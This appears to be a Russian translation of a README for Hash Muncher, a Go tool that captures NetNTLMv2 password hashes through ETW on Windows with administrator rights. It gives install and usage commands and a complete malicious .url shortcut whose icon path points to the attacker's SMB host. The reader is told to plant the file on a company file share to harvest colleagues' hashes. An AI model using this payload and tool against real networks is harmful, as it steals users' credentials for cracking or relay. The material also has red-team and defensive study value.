
Получайте хеши NetNTLMv2 с помощью ETW при наличии прав администратора в Windows 8.1 / Windows Server 2016 и новее.
Получайте хэши NetNTLMv2 с помощью ETW с правами администратора в Windows
Есть три различных варианта для запуска и работы с инструментом
go install github.com/lkarlslund/hashmuncher@latest
git clone https://github.com/lkarlslund/hashmuncher
cd hashmuncher
./build.ps1
Убедитесь, что брандмауэр Windows разрешает "Общий доступ к файлам и принтерам", поскольку Hash Muncher требует встроенную службу SMB для отправки и получения исходного запроса и отправки ответных пакетов целевому устройству.
В командной строке с повышенными правами запустите Hash Muncher
hashmuncher.exe [-output filename.txt] [-timeout nnn] [-tracename yourname] [-help]
[InternetShortcut]
URL=Munch
WorkingDirectory=MunchMunch
IconFile=\\10.1.2.3\%USERNAME%.icon
IconIndex=1
Замените IP-адрес на адрес вашей машины Hach Muncher и сохраните файл на (общедоступном в компании) файловом ресурсе как 'whatever.url', и наблюдайте, как хэши льются рекой.
Существуют и другие методы, упомянутые в Red Team Notes - Forced Authentication, и, вероятно, вы также сможете добиться успеха, разослав всем документ Word, но это совсем не скрытно.
Я время от времени игрался с ETW, но как только увидел очень крутое исследование от Nettitude Labs, я понял, что обязан превратить это в простой в использовании инструмент на моём любимом языке — Golang! У Nettitude Labs есть рабочий POC, написанный на C# и работающий под .Net framework, и, возможно, он станет для вас лучшим вариантом. Так что я здесь ничего не изобретаю, просто предлагаю это как альтернативу.
Если вам нравится тематика безопасности Windows, вам также может понравиться мой инструмент для построения графов атак Adalanche